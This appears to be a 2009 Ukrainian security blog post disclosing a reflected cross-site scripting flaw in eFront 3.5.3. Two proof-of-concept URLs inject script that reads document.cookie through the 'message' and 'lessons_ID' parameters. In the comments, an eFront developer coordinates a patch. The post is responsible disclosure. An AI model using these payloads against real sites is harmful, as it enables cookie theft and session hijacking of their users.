Home > Вразливості \ vulnerabilities > Міжсайтовий скриптинг в Efront

Міжсайтовий скриптинг в Efront

December 27th, 2009 Dimi4 Leave a comment Go to comments

27.10.09
Програма: efront
Версія 3.5.3
Рівень небезпеки: Низький

Опис:
Вразливість дозволяє віддаленому користувачу провести XSS атаку.

Вразливість існує через недостатню фільтрацію вхідних данних  в параметрах “lessons_ID“, “message” в сценарії index.php. Віддалений користувач має змогу за допомогою спеціально сформованого запиту виконати довільний код сценарію в браузері атакуємого.

PoC:

http://site.com/index.php?message=%3Cscript%3Ealert(document.cookie)%3C/script%3E&message_type=success

http://site.com/index.php?ctg=lesson_info&lessons_ID=5%3Cscript%3Ealert(document.cookie)%3C/script%3E

  1. periklis
    December 29th, 2009 at 11:22 | #1

    in which version of efront does this happen?

  2. December 29th, 2009 at 15:37 | #2

    Tested on 3.5.3

  3. periklis
    December 29th, 2009 at 15:47 | #3

    this issue is (supposed to be) solved in later versions, it would be great if you could verify it (there is a publicly available installation of the latest version at demo.efrontlearning.net)

  4. December 29th, 2009 at 17:55 | #4

    I’ve been verified it already. The issue is really solved in last version.

  5. December 29th, 2009 at 18:45 | #5

    @periklis
    I’ve found one more vulnerability. XSS issues wasn’t solved yet in latest version.
    http://uasc.org.ua/2009/12/міжсайтовий-скриптинг-в-efront-3-5-5/

  6. periklis
    December 30th, 2009 at 09:57 | #6

    thank you for your very useful remarks. as a member of efront’s dev team, I’ll make sure we issue a patch very soon. When it’s ready, I’ll post to the new thread you created for people interested to know.

  1. No trackbacks yet.